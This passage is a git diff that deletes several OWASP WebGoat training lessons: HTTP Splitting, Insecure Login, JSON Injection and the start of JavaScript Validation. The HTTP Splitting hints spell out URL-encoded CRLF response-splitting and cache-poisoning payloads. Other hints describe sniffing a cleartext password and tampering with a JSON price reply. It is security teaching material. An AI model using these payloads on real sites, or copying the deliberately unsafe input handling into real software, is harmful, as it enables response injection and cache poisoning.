- return result;
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java b/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java
deleted file mode 100644
index 72b61572b..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java
+++ /dev/null
@@ -1,252 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.net.URLDecoder;
-import java.text.DateFormat;
-import java.text.SimpleDateFormat;
-import java.util.*;
-import javax.servlet.http.HttpServletResponse;
-import org.apache.ecs.*;
-import org.apache.ecs.html.*;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Sherif Koussa Software Secured
- * @created September 30, 2006
- */
-
-public class HttpSplitting extends SequentialLessonAdapter
-{
-
- private final static String LANGUAGE = "language";
-
- private final static String REDIRECT = "fromRedirect";
-
- private static String STAGE = "stage";
-
- public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-
- /**
- * Description of the Method
- *
- * @param s
- * Current WebSession
- */
- public void handleRequest(WebSession s)
- {
- // Setting a special action to be able to submit to redirect.jsp
- Form form = new Form(s.getRequest().getContextPath() + "/lessons/General/redirect.jsp?" + "Screen=" + String.valueOf(getScreenId())
- + "&menu=" + getDefaultCategory().getRanking().toString(), Form.POST).setName("form").setEncType("");
-
- form.addElement(createContent(s));
-
- setContent(form);
- }
-
- protected Element doHTTPSplitting(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String lang = null;
-
- try
- {
- ec.addElement(createAttackEnvironment(s));
- lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
-
- // Check if we are coming from the redirect page
- String fromRedirect = s.getParser().getStringParameter("fromRedirect", "");
-
- if (lang.length() != 0 && fromRedirect.length() != 0)
- {
-
-
- String[] arrTokens = lang.toString().toUpperCase().split("\r\n");
-
- // Check if the user ended the first request and wrote the second malicious reply
- if (arrTokens.length > 1)
- {
- HttpServletResponse res = s.getResponse();
- res.setContentType("text/html");
-
- StringBuffer msg = new StringBuffer();
-
- msg.append("Good Job! ");
- msg.append("This lesson has detected your successful attack, ");
- msg.append("time to elevate your attack to a higher level. ");
- msg.append("Try again and add Last-Modified header, intercept");
- msg.append("the reply and replace it with a 304 reply.");
-
- s.setMessage(msg.toString());
- getLessonTracker(s).setStage(2);
-
-
- //makeSuccess(s);
-
- }
- }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
- return (ec);
- }
-
- protected Element createContent(WebSession s)
- {
- return super.createStagedContent(s);
- }
-
- protected Element doStage1(WebSession s) throws Exception
- {
- return doHTTPSplitting(s);
- }
-
- protected Element doStage2(WebSession s) throws Exception
- {
- return doCachePoisining(s);
- }
-
- protected Element createAttackEnvironment(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
- String lang = null;
-
- if (getLessonTracker(s).getStage() == 1)
- {
- ec.addElement(new H3("Stage 1: HTTP Splitting:
"));
- }
- ec.addElement(new StringElement("Search by country : "));
-
- lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
-
- // add the search by field
- Input input = new Input(Input.TEXT, LANGUAGE, lang.toString());
- ec.addElement(input);
-
- Element b = ECSFactory.makeButton("Search!");
-
- ec.addElement(b);
-
- return ec;
- }
-
- protected Element doCachePoisining(WebSession s) throws Exception
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- s.setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison"
- + " the victim's cache. Type 'restart' in the input field if you wish to "
- + " to return to the HTTP Splitting lesson.
");
- if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals("restart"))
- {
- getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
- return (doHTTPSplitting(s));
- }
-
- ec.addElement(createAttackEnvironment(s));
- String lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
- String fromRedirect = s.getParser().getStringParameter(REDIRECT, "");
-
- if (lang.length() != 0 && fromRedirect.length() != 0)
- {
- String lineSep = "\r\n";
- String dateStr = lang.substring(lang.indexOf("Last-Modified:") + "Last-Modified:".length(), lang
- .indexOf(lineSep, lang.indexOf("Last-Modified:")));
- if (dateStr.length() > 0)
- {
- Calendar cal = Calendar.getInstance();
-
- DateFormat sdf = new SimpleDateFormat("EEE, dd MMM yyyy HH:mm:ss z", Locale.US);
-
- if (sdf.parse(dateStr.trim()).after(cal.getTime()))
- {
- makeSuccess(s);
- }
- }
- }
- } catch (Exception ex)
- {
- ec.addElement(new P().addElement(ex.getMessage()));
- }
- return ec;
- }
-
- protected Category getDefaultCategory()
- {
- return Category.GENERAL;
- }
-
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Enter a language for the system to search by.");
- hints.add("Use CR (%0d) and LF (%0a) for a new line in Windows and only LF (%0a) in Linux.");
- hints.add("The Content-Length: 0 will tell the server that the first request is over.");
- hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
- hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM Try: foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked!%3C%2Fhtml%3E For insight into what this does, use the PHP charset encoder to decode it.");
- hints.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
- hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM Try foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202080%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked%20J%3C%2Fhtml%3E");
- hints.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
- hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT");
- return hints;
-
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(20);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("HTTP Splitting");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/InsecureLogin.java b/src/main/java/org/owasp/webgoat/lessons/InsecureLogin.java
deleted file mode 100644
index 0b70447b5..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/InsecureLogin.java
+++ /dev/null
@@ -1,496 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.Option;
-import org.apache.ecs.html.Select;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.style;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.WebSession;
-
-
-public class InsecureLogin extends SequentialLessonAdapter
-{
-
- private final static String USER = "clear_user";
- private final static String PASSWORD = "clear_pass";
- private final static String ANSWER = "clear_answer";
- private final static String YESNO = "yesno";
- private final static String PROTOCOL = "protocol";
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- return super.createStagedContent(s);
- }
-
- @Override
- protected Element doStage1(WebSession s) throws Exception
- {
- String answer = s.getParser().getStringParameter(ANSWER, "");
- if (answer.equals("sniffy"))
- {
- s.setMessage("You completed Stage 1!");
- getLessonTracker(s).setStage(2);
- }
- return createMainContent(s);
- }
-
- @Override
- protected Element doStage2(WebSession s) throws Exception
- {
- String protocol = s.getParser().getStringParameter(PROTOCOL, "");
- String yesno = s.getParser().getStringParameter(YESNO, "");
-
- if (yesno.equals("No") && protocol.equals("TLS"))
- {
- makeSuccess(s);
- }
-
- return createMainContent(s);
- }
-
- /**
- * Creation of the main content
- *
- * @param s
- * @return Element
- */
- protected Element createMainContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- style sty = new style();
-
- sty
- .addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} .lesson_text {height: 240px;width: 460px;padding-top: 5px;} #lesson_buttons_bottom {height: 20px;width: 460px;} #lesson_b_b_left {width: 300px;float: left;} #lesson_b_b_right input {width: 100px;float: right;} .lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} .lesson_workspace { } .lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} .lesson_text_db {color: #0066FF} #lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;} #lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
- ec.addElement(sty);
-
- Div wrapperDiv = new Div();
- wrapperDiv.setID("lesson_wrapper");
-
- Div headerDiv = new Div();
- headerDiv.setID("lesson_header");
-
- Div workspaceDiv = new Div();
- workspaceDiv.setClass("lesson_workspace");
-
- wrapperDiv.addElement(headerDiv);
- wrapperDiv.addElement(workspaceDiv);
-
- ec.addElement(wrapperDiv);
-
- String user = s.getParser().getStringParameter(USER, "");
- String password = s.getParser().getStringParameter(PASSWORD, "");
- if (!(user + password).equals("") && correctLogin(user, password, s))
- {
- workspaceDiv.addElement(createSuccessfulLoginContent(s, user));
- }
- else
- {
- workspaceDiv.addElement(createLogInContent());
- }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
-
- return (ec);
- }
-
- /**
- * Create content for logging in
- *
- * @param ec
- */
- private Element createLogInContent()
- {
- ElementContainer ec = new ElementContainer();
- Div loginDiv = new Div();
- loginDiv.setID("lesson_login");
-
- Table table = new Table();
- table.addAttribute("align='center'", 0);
- TR tr1 = new TR();
- TD td1 = new TD();
- TD td2 = new TD();
- td1.addElement(new StringElement("Enter your name: "));
- td2.addElement(new Input(Input.TEXT, USER).setValue("Jack").setReadOnly(true));
- tr1.addElement(td1);
- tr1.addElement(td2);
-
- TR tr2 = new TR();
- TD td3 = new TD();
- TD td4 = new TD();
- td3.addElement(new StringElement("Enter your password: "));
- td4.addElement(new Input(Input.PASSWORD, PASSWORD).setValue("sniffy").setReadOnly(true));
- tr2.addElement(td3);
- tr2.addElement(td4);
-
- TR tr3 = new TR();
- TD td5 = new TD();
- td5.setColSpan(2);
- td5.setAlign("center");
-
- td5.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
- tr3.addElement(td5);
-
- table.addElement(tr1);
- table.addElement(tr2);
- table.addElement(tr3);
- loginDiv.addElement(table);
- ec.addElement(loginDiv);
- return ec;
-
- }
-
- /**
- * Gets the category attribute of the ForgotPassword object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
-
- return Category.INSECURE_COMMUNICATION;
- }
-
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
-
- hints.add("Stage 1: Use a sniffer to record " + "the traffic");
- hints.add("Stage 1: What Protocol does the request use?");
- hints.add("Stage 1: What kind of request is started when " + "you click on the button?");
- hints.add("Stage 1: Take a closer look at the HTTP Post request in " + "your sniffer");
- hints.add("Stage 1: The password field has the name clear_pass");
-
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(100);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Insecure Login");
- }
-
- @Override
- public String getInstructions(WebSession s)
- {
- int stage = getLessonTracker(s).getStage();
- String instructions = "";
- instructions = "For this lesson you need to " + "have a server client setup. Please refer to the"
- + "Tomcat Configuration in the Introduction section.
Stage" + stage + ": ";
- if (stage == 1)
- {
- instructions += "In this stage you have to sniff the "
- + "password. And answer the question after the login.";
- }
- if (stage == 2)
- {
- instructions += "Now you have to change to a secure " + "connection. The URL should start with https:// "
- + "If your browser is complaining about the certificate just "
- + "ignore it. Sniff again the traffic and answer the" + " questions";
- }
- return instructions;
- }
-
- /**
- * See if the password and corresponding user is valid
- *
- * @param userName
- * @param password
- * @param s
- * @return true if the password was correct
- */
- private boolean correctLogin(String userName, String password, WebSession s)
- {
- Connection connection = null;
- try
- {
- connection = DatabaseUtilities.getConnection(s);
- String query = "SELECT * FROM user_data_tan WHERE first_name = ? AND password = ?";
- PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- prepStatement.setString(1, userName);
- prepStatement.setString(2, password);
-
- ResultSet results = prepStatement.executeQuery();
-
- if ((results != null) && (results.first() == true)) {
-
- return true;
-
- }
-
- } catch (Exception e)
- {
- e.printStackTrace();
- } finally
- {
- try
- {
- if (connection != null)
- {
- connection.close();
- }
- } catch (Exception e)
- {
- e.printStackTrace();
- }
- }
-
- return false;
-
- }
-
- /**
- * Create content after a successful login
- *
- * @param s
- * @param ec
- */
- private Element createSuccessfulLoginContent(WebSession s, String user)
- {
- ElementContainer ec = new ElementContainer();
-
- String userDataStyle = "margin-top:50px;";
-
- Div userDataDiv = new Div();
- userDataDiv.setStyle(userDataStyle);
- userDataDiv.addAttribute("align", "center");
- Table table = new Table();
- table.addAttribute("cellspacing", 10);
- table.addAttribute("cellpadding", 5);
-
- table.addAttribute("align", "center");
- TR tr1 = new TR();
- TR tr2 = new TR();
- TR tr3 = new TR();
- TR tr4 = new TR();
- tr1.addElement(new TD("Firstname:"));
- tr1.addElement(new TD(user));
-
- try
- {
- ResultSet results = getUser(user, s);
- results.first();
-
- tr2.addElement(new TD("Lastname:"));
- tr2.addElement(new TD(results.getString("last_name")));
-
- tr3.addElement(new TD("Credit Card Type:"));
- tr3.addElement(new TD(results.getString("cc_type")));
-
- tr4.addElement(new TD("Credit Card Number:"));
- tr4.addElement(new TD(results.getString("cc_number")));
-
- }
-
- catch (Exception e)
- {
- e.printStackTrace();
- }
- table.addElement(tr1);
- table.addElement(tr2);
- table.addElement(tr3);
- table.addElement(tr4);
-
- userDataDiv.addElement(table);
- ec.addElement(userDataDiv);
- ec.addElement(createLogoutLink());
-
- int stage = getLessonTracker(s).getStage();
- if (stage == 1)
- {
- ec.addElement(createPlaintextQuestionContent());
- }
- else if (stage == 2)
- {
- ec.addElement(createSSLQuestionContent());
- }
-
- return ec;
- }
-
- private Element createPlaintextQuestionContent()
- {
- ElementContainer ec = new ElementContainer();
- Div div = new Div();
- div.addAttribute("align", "center");
- div.addElement(new BR());
- div.addElement(new BR());
- div.addElement("What was the password?");
- div.addElement(new Input(Input.TEXT, ANSWER));
- div.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
- ec.addElement(div);
- return ec;
- }
-
- private Element createSSLQuestionContent()
- {
- ElementContainer ec = new ElementContainer();
- Table selectTable = new Table();
- TR tr1 = new TR();
- TD td1 = new TD();
- TD td2 = new TD();
- TR tr2 = new TR();
- TD td3 = new TD();
- TD td4 = new TD();
- tr1.addElement(td1);
- tr1.addElement(td2);
- tr2.addElement(td3);
- tr2.addElement(td4);
- selectTable.addElement(tr1);
- selectTable.addElement(tr2);
-
- Div div = new Div();
- div.addAttribute("align", "center");
- ec.addElement(new BR());
- ec.addElement(new BR());
-
- td1.addElement("Is the password still transmited in plaintext?");
- Select yesNoSelect = new Select();
- yesNoSelect.setName(YESNO);
- Option yesOption = new Option();
- yesOption.addElement("Yes");
- Option noOption = new Option();
- noOption.addElement("No");
- yesNoSelect.addElement(yesOption);
- yesNoSelect.addElement(noOption);
- td2.addElement(yesNoSelect);
-
- td3.addElement("Which protocol is used for the transmission?");
- Select protocolSelect = new Select();
- protocolSelect.setName(PROTOCOL);
- Option httpOption = new Option();
- httpOption.addElement("HTTP");
- Option tcpOption = new Option();
- tcpOption.addElement("UDP");
- Option ipsecOption = new Option();
- ipsecOption.addElement("IPSEC");
- Option msnmsOption = new Option();
- msnmsOption.addElement("MSNMS");
- Option tlsOption = new Option();
- tlsOption.addElement("TLS");
- protocolSelect.addElement(httpOption);
- protocolSelect.addElement(ipsecOption);
- protocolSelect.addElement(msnmsOption);
- protocolSelect.addElement(tcpOption);
- protocolSelect.addElement(tlsOption);
- td4.addElement(protocolSelect);
-
- div.addElement(selectTable);
-
- div.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
- ec.addElement(div);
- return ec;
- }
-
- /**
- * Get a user by its name
- *
- * @param user
- * @param s
- * @return ResultSet containing the user
- */
- private ResultSet getUser(String user, WebSession s)
- {
- Connection connection = null;
- try
- {
- connection = DatabaseUtilities.getConnection(s);
- String query = "SELECT * FROM user_data_tan WHERE first_name = ? ";
- PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- prepStatement.setString(1, user);
-
- ResultSet results = prepStatement.executeQuery();
-
- return results;
-
- } catch (Exception e)
- {
- e.printStackTrace();
- } finally
- {
- try
- {
- if (connection != null)
- {
- connection.close();
- }
- } catch (Exception e)
- {
- e.printStackTrace();
- }
- }
- return null;
-
- }
-
- /**
- * Create a link for logging out
- *
- * @return Element
- */
- private Element createLogoutLink()
- {
- A logoutLink = new A();
- logoutLink.addAttribute("href", getLink() + "&logout=true");
- logoutLink.addElement("Logout");
-
- String logoutStyle = "margin-right:50px; mrgin-top:30px";
- Div logoutDiv = new Div();
- logoutDiv.addAttribute("align", "right");
- logoutDiv.addElement(logoutLink);
- logoutDiv.setStyle(logoutStyle);
-
- return logoutDiv;
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/JSONInjection.java b/src/main/java/org/owasp/webgoat/lessons/JSONInjection.java
deleted file mode 100644
index 267c2a335..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/JSONInjection.java
+++ /dev/null
@@ -1,298 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import org.owasp.webgoat.session.WebSession;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.BR;
-import java.io.PrintWriter;
-import java.util.List;
-import java.util.ArrayList;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Sherif Koussa Software Secured
- * @created December 25, 2006
- */
-
-public class JSONInjection extends LessonAdapter
-{
-
- private final static Integer DEFAULT_RANKING = new Integer(30);
-
- private final static String TRAVEL_FROM = "travelFrom";
-
- private final static String TRAVEL_TO = "travelTo";
-
- private final static IMG MAC_LOGO = new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured")
- .setBorder(0).setHspace(0).setVspace(0);
-
- public void handleRequest(WebSession s)
- {
-
- try
- {
- if (s.getParser().getRawParameter("from", "").equals("ajax"))
- {
- String lineSep = System.getProperty("line.separator");
- String jsonStr = "{" + lineSep + "\"From\": \"Boston\"," + lineSep + "\"To\": \"Seattle\", " + lineSep
- + "\"flights\": [" + lineSep
- + "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"}," + lineSep
- + "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", \"price\": \"$300\"} " + lineSep + "]"
- + lineSep + "}";
- s.getResponse().setContentType("text/html");
- s.getResponse().setHeader("Cache-Control", "no-cache");
- PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
- out.print(jsonStr);
- out.flush();
- out.close();
- return;
- }
- } catch (Exception ex)
- {
- ex.printStackTrace();
- }
-
- Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
- form.setOnSubmit("return check();");
-
- form.addElement(createContent(s));
-
- setContent(form);
-
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Current WebSession
- */
-
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String lineSep = System.getProperty("line.separator");
- String script = "" + lineSep;
- ec.addElement(new StringElement(script));
- Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
-
- TR tr = new TR();
-
- tr.addElement(new TD("From: "));
- Input in = new Input(Input.TEXT, TRAVEL_FROM, "");
- in.addAttribute("onkeyup", "getFlights();");
- in.addAttribute("id", TRAVEL_FROM);
- tr.addElement(new TD(in));
-
- t1.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD("To: "));
- in = new Input(Input.TEXT, TRAVEL_TO, "");
- in.addAttribute("onkeyup", "getFlights();");
- in.addAttribute("id", TRAVEL_TO);
- tr.addElement(new TD(in));
-
- t1.addElement(tr);
- ec.addElement(t1);
-
- ec.addElement(new BR());
- ec.addElement(new BR());
- Div div = new Div();
- div.addAttribute("name", "flightsDiv");
- div.addAttribute("id", "flightsDiv");
- ec.addElement(div);
-
- Input b = new Input();
- b.setType(Input.SUBMIT);
- b.setValue("Submit");
- b.setName("SUBMIT");
- ec.addElement(b);
-
- Input price2Submit = new Input();
- price2Submit.setType(Input.HIDDEN);
- price2Submit.setName("price2Submit");
- price2Submit.setValue("");
- price2Submit.addAttribute("id", "price2Submit");
- ec.addElement(price2Submit);
- if (s.getParser().getRawParameter("radio0", "").equals("on"))
- {
- String price = s.getParser().getRawParameter("price2Submit", "");
- price = price.replace("$", "");
- if (Integer.parseInt(price) < 600)
- {
- makeSuccess(s);
- }
- else
- {
- s.setMessage("You are close, try to set the price for the non-stop flight to be less than $600");
- }
- }
- return ec;
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO);
- }
-
- protected Category getDefaultCategory()
- {
- return Category.AJAX_SECURITY;
- }
-
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("JSON stands for JavaScript Object Notation.");
- hints.add("JSON is a way of representing data just like XML.");
- hints.add("The JSON payload is easily interceptable.");
- hints.add("Intercept the reply, change the $600 to $25.");
- return hints;
-
- }
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("JSON Injection");
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/JavaScriptValidation.java b/src/main/java/org/owasp/webgoat/lessons/JavaScriptValidation.java
deleted file mode 100644
index 726971e98..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/JavaScriptValidation.java
+++ /dev/null
@@ -1,270 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.TextArea;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
- */
-
-public class JavaScriptValidation extends LessonAdapter
-{
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
-
- ElementContainer ec = new ElementContainer();
-
- // Regular expressions in Java and JavaScript compatible form
-
- // Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax
-
- // you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one
- // for JavaScript
-
- String regex1 = "^[a-z]{3}$";// any three lowercase letters
- String regex2 = "^[0-9]{3}$";// any three digits
- String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation
- String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of
- // numbers
- String regex5 = "^\\d{5}$";// simple zip code
- String regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four
- String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";// US phone number with or without dashes
- Pattern pattern1 = Pattern.compile(regex1);
- Pattern pattern2 = Pattern.compile(regex2);
- Pattern pattern3 = Pattern.compile(regex3);
- Pattern pattern4 = Pattern.compile(regex4);
- Pattern pattern5 = Pattern.compile(regex5);
- Pattern pattern6 = Pattern.compile(regex6);
- Pattern pattern7 = Pattern.compile(regex7);
- String lineSep = System.getProperty("line.separator");
- String script = "" + lineSep;
- try
- {
- String param1 = s.getParser().getRawParameter("field1", "abc");
- String param2 = s.getParser().getRawParameter("field2", "123");
- String param3 = s.getParser().getRawParameter("field3", "abc 123 ABC");
- String param4 = s.getParser().getRawParameter("field4", "seven");
- String param5 = s.getParser().getRawParameter("field5", "90210");
- String param6 = s.getParser().getRawParameter("field6", "90210-1111");
- String param7 = s.getParser().getRawParameter("field7", "301-604-4882");
- ec.addElement(new StringElement(script));
- TextArea input1 = new TextArea("field1", 1, 25).addElement(param1);
- TextArea input2 = new TextArea("field2", 1, 25).addElement(param2);
- TextArea input3 = new TextArea("field3", 1, 25).addElement(param3);
